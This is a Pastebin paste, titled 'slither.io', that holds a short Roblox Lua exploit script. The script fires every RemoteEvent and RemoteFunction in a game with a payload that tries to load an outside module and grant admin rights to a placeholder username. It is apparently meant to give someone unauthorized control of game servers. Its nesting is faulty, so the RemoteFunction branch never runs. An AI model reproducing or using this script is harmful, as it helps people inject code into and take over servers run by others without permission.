thi2004

slither.io

Sep 12th, 2018
163
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. for i=1,30 do
  2. for i,v in pairs(game:GetDescendants()) do
  3. if v:IsA("RemoteEvent") then
  4. v:FireServer([[require(520532182).giveAdmin"YOURNAME"]])
  5. warn("executed.admin.test")
  6. if v:IsA("RemoteFunction") then
  7. v:InvokeServer([[require(520532182).giveAdmin"YOURNAME"]])
  8. end
  9. end
  10. end
  11. end
Advertisement
Add Comment
Please, Sign In to add comment